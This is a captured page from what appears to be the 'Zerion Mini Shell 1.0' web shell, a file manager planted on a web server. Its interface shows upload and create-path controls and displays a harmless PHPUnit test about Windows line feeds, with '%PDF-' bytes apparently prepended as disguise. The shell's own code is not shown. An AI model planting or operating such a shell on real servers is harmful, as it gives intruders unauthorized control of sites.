%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/car_rent/vendor/phpunit/phpunit/tests/Regression/GitHub/581/
Upload File :
Create Path :
Current File : /var/www/html/car_rent/vendor/phpunit/phpunit/tests/Regression/GitHub/581/Issue581Test.php

<?php
class Issue581Test extends PHPUnit_Framework_TestCase
{
    public function testExportingObjectsDoesNotBreakWindowsLineFeeds()
    {
        $this->assertEquals(
            (object) array(1, 2, "Test\r\n", 4, 5, 6, 7, 8),
            (object) array(1, 2, "Test\r\n", 4, 1, 6, 7, 8)
        );
    }
}

Zerion Mini Shell 1.0